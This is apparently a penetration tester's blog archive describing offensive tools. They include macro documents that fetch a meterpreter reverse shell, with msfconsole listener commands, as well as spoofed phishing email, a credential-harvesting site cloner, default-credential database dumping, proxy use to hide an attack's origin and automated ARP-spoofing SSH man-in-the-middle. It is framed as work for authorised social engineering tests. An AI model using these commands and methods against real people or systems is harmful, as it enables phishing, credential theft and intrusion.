Phishing Toys

February 1, 2016 Leave a comment

I wrote 2 scripts with the help of a co-worker that are useful in our social engineering engagements.

  • injectShell.py – This script generates Microsoft documents (VBA code) that uses Powershell to get a meterpreter reverse shell. This script works on a Linux/Mac machine unlike some scripts I found which requires a Windows machine. This works by patching the hex bytes (ip address and port) in the pre-generated office documents.
  • sendEmail.py – This script is useful in sending spoofed emails to some SMTP servers.

 

Check the below link for the Github repository
https://github.com/milo2012/Social-Engineering-Toys

 

 injectShell.py

The script generates office documents (xls, doc and ppt) that includes VBA code that downloads and run the Invoke-Shellcode.ps1 (creates a meterpreter reverse shell back to server) when the victim enables Macro in the document.

You will need to run the windows/meterpreter/reverse_https payload on your the attacker host.

$ ./msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST consulting.example.org
msf exploit(handler) > set LPORT 4443
msf exploit(handler) > set SessionCommunicationTimeout 0
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Below is the help screen of the script.

$  python injectShell.py -h
usage: injectShell.py [-h] [-t T] [-o O] [-ip IP] [-port PORT]

optional arguments:
  -h, --help  show this help message and exit
  -t T        [xls|doc|ppt|all]
  -o O        [output filename (without extension)]
  -ip IP      [meterpreter listener ip address]
  -port PORT  [meterpreter listener port]

Below is the script in action.

$  python injectShell.py -t all -o salary -ip 192.168.1.6 -port 1111 
- Generated: salary.xls
- Generated: salary.doc
- Generated: salary.ppt

sendEmail.py
This script is useful in sending spoofed emails to some SMTP servers. This can be useful in social engineering engagements.

Below is the help screen of the script.

$ python sendEmail.py -h
usage: sendEmail.py [-h] [-f F] [-n N] [-e E] [-t T] [-iL IL] [-v]

optional arguments:
  -h, --help  show this help message and exit
  -f F        [html file containing the email body]
  -n N        [recipient name]
  -e E        [recipient email]
  -t T        [delay between 1 to x seconds (random)]
  -iL IL      [file containing recipient name and email addresses per line
              separated by comma]
  -v          [verbose]

Below is the script in action.

$ python sendEmail.py -iL namelist.txt -f sampleHtml.txt -t 10
Sending email to: test01@example.com  

You can use keywords like @trackingCode and @user in HTML emails which will be replaced by the values listed in namelist.txt. (See sampleHTML.txt for an example of the usage of two keywords)

  • @user is the victim’s name (1st field in namelist.txt)
  • @trackingCode is the individual codes assigned to per victim email address in Phishing Frenzy (3rd field in namelist.txt)

Below are two sample formats of namelist.txt
Below is sample 1
The fields are separated by “,”
The first field is: recipient’s name
The second field is: recipient’s email address

Keith,keith123@hotmail.com

Below is sample 2
The first field is: recipient’s name
The second field is: recipient’s email address
The last field is: tracking code

Keith,keith123@hotmail.com,UAG21E

Easily clone sites and import as Phishing Frenzy templates (Phishing for passwords)

January 22, 2016 Leave a comment

Phishing Frenzy is an awesome tool to use during Social Engineering/Spear Phishing exercises.

One of the tasks that I spent a lot of time on when using Phishing Frenzy is the ‘cloning of a website’ to be used for phishing passwords.

Phishing Frenzy does have a ‘Website Cloner’ but its pretty basic and some work needs to be done on the generated HTML file before it can be used as a template. (e.g. modify the input name of the username and password fields, changing the form action URL, create the template.yml and attachments.yml and zip up the files).

I wrote a simple script to take the URL of the website you want to clone (along with other information like Phishing Frenzy server URL and the ‘fake domain name/public IP address of the server hosting the cloned website’) and generates a working template zip that you can import directly into Phishing Frenzy under Templates > Restore menu.

Hope this can be of help to anyone of you in future social engineering engagements.

Below is a screenshot of the script in action.

phishing frenzy template zip generator

When a user visits and keys in the credentials into the cloned website, the credentials will be recorded into the creds.log file and also sent to your phishing frenzy server .

You can find the python scripts at https://github.com/milo2012/phishing-frenzy-template-cloner
Thank you for reading.

Updates:  I have update the template to include browser plugin enumeration via Javascript. This should be useful for some. The information is sent back to your Phishing Frenzy server.

 

metasploitHelper and nmap2nessus released at Blackhat Asia Arsenal 2015

March 30, 2015 Leave a comment

@mgianarakis and me (@keith55) presented two new tools (metasploitHelper and nmap2nessus) at Blackhat Asia Arsenal in Singapore on 26th and 27th of March, 2015.

The tools were developed to help guys like us during vulnerability assessments and penetration tests.

Blog posts about the tools will be coming soon. Meanwhile, the information on the Github pages should be sufficient to get you started.
The tools are open source.  Feel free to contribute to the projects. Thank you

MetasploitHelper
Slides: http://bit.ly/1D62PWB
GitHub: https://github.com/milo2012/nmap2nessus

Nmap2nessus
Slides: http://bit.ly/1GxaYTA
GitHub: https://github.com/milo2012/metasploitHelper

Pentesting Firebird Databases

January 9, 2015 Leave a comment

There seems to be limited information on pentesting Firebird databases on the Internet.
Firebird database server listens on TCP port 3050.

One good resource I found is http://blog.opensecurityresearch.com/2012/07/fun-with-firebird-database-default.html.

It seems like most people do not change the default SYSDBA credentials for their Firebird database. Below are the default credentials. 
Username:
SYSDBA
Password: masterkey

I have encountered before that the access card database system was using Firebird database for its backend.
This python script requires pyfirebirdsql library from https://github.com/nakagami/pyfirebirdsql.

Firebird requires you to supply the database name on the server you are trying to.
One way to get around it is to check for active connections on the Firebird database server.

What this tools does is to
1. Connect to the Firebird database server using the default credentials
2. List the connected databases
3. Dump the records from the Firebird database server

You can also use the -wordlist argument to supply it a wordlist of database names so that it can attempt to brute-force. That is useful if there aren’t any active connections (or databases not mounted) on the Firebird database that you are trying to access.

Below is a screenshot of the tool in action.
firebirdBrute.py

The common-tables.txt file from sqlmap is useful if you need a wordlist.
https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/txt/common-tables.txt

The tool can be downloaded from the below Github repo.
https://github.com/milo2012/firebirdDump

Proxy Tester Script

January 8, 2015 Leave a comment

I wrote a script to tests and sorts proxy servers (socks4, socks5, http, https).
There are readily available scripts out there on the Internet that does the same. I just want to write my own.

Sometimes, during a web application test, your IP address might get flagged and blocked by the target’s WAF.
Proxy servers might just be useful in this type of situation. However, regard all proxy servers as malicious and unsafe. You do not want to send sensitive data like credentials over the proxy servers.

If you are doing anything malicious, do not access the proxy servers directly as the ISP might be able to pinpoint the end point of the attack easily.

Below is a screenshot of the help menu for the proxyTester.py script.

proxyTester.py
By default, the script tests the proxy servers to see if it supports SSL connections.

Below is an example of the command to run

python proxyTester.py -i proxies.txt -o profile1 -n 100  -time -t https -sort

The script accepts a text file containing proxy servers in the below format
190.207.5.201:9064

The input file can contain a mixture of Socks4, Socks5, HTTPs, HTTP proxies.

In the below example, the script reads the list of proxies from the file using the -in argument, tests and sorts the proxies using 80 concurrent threads into categories (Socks4, Socks5, HTTPs) and outputs a Proxifier profile PPX file (which you can import into Proxifier if you are using this).

ProxyTester.py

You can use the -time argument in the script to test the latency of the connection.
It might be useful as you might want to avoid using a proxy that has a high latency.
Your computer -> Proxy server -> Website

proxyTester.py

You can download the script from the below Github repo.
https://github.com/milo2012/proxy_tester

Categories: Pentest Scripts

Test AS/400 for default credentials

December 7, 2014 Leave a comment

I wrote a simple script to test default credentials in AS/400. I made use of the library and sample code from http://tn5250py.cvs.sourceforge.net/.  It currently only works with IBM AS/400 telnet servers for now.

You can pull the code from https://github.com/milo2012/pentest_scripts/tree/master/as400.
You will have to supply the ip and port of the AS400 server in the command line

Help screen for AS/400 tool

Below is a screenshot of the tool in action.

Test AS/400 Default Credentials

Automating Man-in-the-Middle SSHv2 attacks

November 12, 2014 3 comments

Recently during an internal penetration test, I was performing ARP spoofing and i discovered a SSH connection from the administrator computer to another box.

That sounds like the correct way to access remote hosts securely. However, the problem was that the company was using a network switch that was vulnerable to ARP spoofing.

I came across the below article about performing ARP spoofing and MITM SSH connections to steal credentials.

When performing arp spoofing and performing a mitm attack on SSH, the victim does get an alert message saying that there is a key mismatch but most people just ignore them anyway.

Below is the link to the original article.
http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/

In the article, the author demonstrates the use of a software called JMITM2 (http://www.david-guembel.de/index.php?id=6) which is sort of like a honey pot that proxies SSH connections between the victim and the target SSH server.

However, there are a number of steps to be done manually to execute this attack during an internal penetration test.

1. Check if network is vulnerable to ARP spoofing
2. Check if there are any active SSH connections in the network
2. Identify the victim computer and SSH server
3. Modify the configuration files of JMITM2
4. Modifying iptables
5. ARP spoofing
6. Checking JMITM2 console for credentials
7. Re-arp the router and victim host with the correct MAC addresses of each.

It would save a great amount of time to automate these steps. I wrote a script that does just that.

Running the command below checks the network for active SSH connections (via ARP spoofing) and then automates the whole attack to outputs any credentials captured to the console.

python2.7 mitmSSH.py -analyze

If you know the victim host IP and SSH server, you can use the below command

python2.7 mitmSSH.py -host victims -ssh sshServerIP

IMG_2025.PNG
This script has only been tested on Kali Linux.

There are a couple of things that are still in the works to improve the script.
1. Switching from intercepter-ng for ARP spoofing to scapy.

The script can be grabbed from the below link
https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py

Categories: Uncategorized Tags: , ,